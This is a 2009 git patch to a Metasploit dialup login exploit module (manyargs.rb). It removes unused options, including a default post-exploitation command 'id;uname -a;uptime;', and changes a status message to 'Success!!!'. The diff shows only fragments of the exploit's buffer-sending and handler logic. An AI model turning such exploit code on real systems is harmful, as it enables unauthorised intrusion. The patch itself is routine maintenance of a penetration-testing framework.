From 1df854bee7c4f5ec02c1b1b0adff4657f00620b1 Mon Sep 17 00:00:00 2001 From: druid <> Date: Tue, 30 Jun 2009 14:09:19 +0000 Subject: [PATCH] Removed unused options, added success message. git-svn-id: file:///home/svn/framework3/trunk@6730 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/dialup/multi/login/manyargs.rb | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index 0ffafdfa52..bfbb3f89d2 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -64,9 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ -# OptInt.new('RETADDR', [true, 'Return Address', 0x00027184]), # OptString.new('USER', [true, 'User to log in as', 'bin']), - OptString.new('COMMAND', [true, 'Command to execute upon exploitation', 'id;uname -a;uptime;']), ], self.class ) @@ -180,7 +178,6 @@ class Metasploit3 < Msf::Exploit::Remote # send the evil buffer, 256 chars at a time print_status("Sending evil buffer...") #puts Rex::Text.to_hex_dump(buf) -# dialup_puts(buf) len = buf.length p = 0 while(len > 0) do @@ -218,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("Calling handler...") + print_status("Success!!!") handler disconnect_dialup